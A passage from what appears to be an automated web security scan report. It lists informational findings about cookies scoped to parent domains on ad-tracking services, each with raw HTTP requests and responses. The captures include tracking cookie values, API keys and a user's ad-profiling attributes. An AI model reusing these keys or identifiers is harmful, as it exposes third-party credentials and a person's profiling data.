Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-2; expires=Mon, 06 Aug 2012 10:53:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-2; expires=Mon, 06-Aug-2012 10:53:19 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.37. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959895/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 16 Jun 2010 19:08:58 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2; expires=Mon, 06 Aug 2012 11:08:59 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-:A; expires=Mon, 06-Aug-2012 11:08:59 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d844890/33/39959895/decide.php?ord=1308251339 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251333485&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 19:08:59 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: CS1=deleted; expires=Wed, 16 Jun 2010 19:08:58 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2; expires=Mon, 06 Aug 2012 11:08:59 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-:A; expires=Mon, 06-Aug-2012 11:08:59 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.38. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959897/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 16 Jun 2010 19:14:09 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-1_39959897-33-2; expires=Mon, 06 Aug 2012 11:14:10 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-ZE; expires=Mon, 06-Aug-2012 11:14:10 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d844890/33/39959897/decide.php?ord=1308251650 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251644184&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-/A

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 19:14:10 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Wed, 16 Jun 2010 19:14:09 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-1_39959897-33-2; expires=Mon, 06 Aug 2012 11:14:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-ZE; expires=Mon, 06-Aug-2012 11:14:10 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.39. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3issEgfzSEAY1ExkNK7HUtFp4B4dlWpgdhuAlTUnPBEYj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 16 Jun 2011 11:22:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3issEgfzSEAY1ExkNK7HUtFp4B4dlWpgdhuAlTUnPBEYj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...

10.40. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2tvsTu4EM2aVExkNK7HUtFp4B4dlWpgdii5wmxEk54PYz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Thu, 16 Jun 2011 11:22:22 GMT
Location: http://pix04.revsci.net/D10889/a1/0/3/0.gif?D=DM_LOC=http://bizo.com?&seniority=executive&industry=business_services&functional_area=it_systems_analysts&functional_area=information_technology&location=texas&group=tech_business_professional&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2tvsTu4EM2aVExkNK7HUtFp4B4dlWpgdii5wmxEk54PYz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJR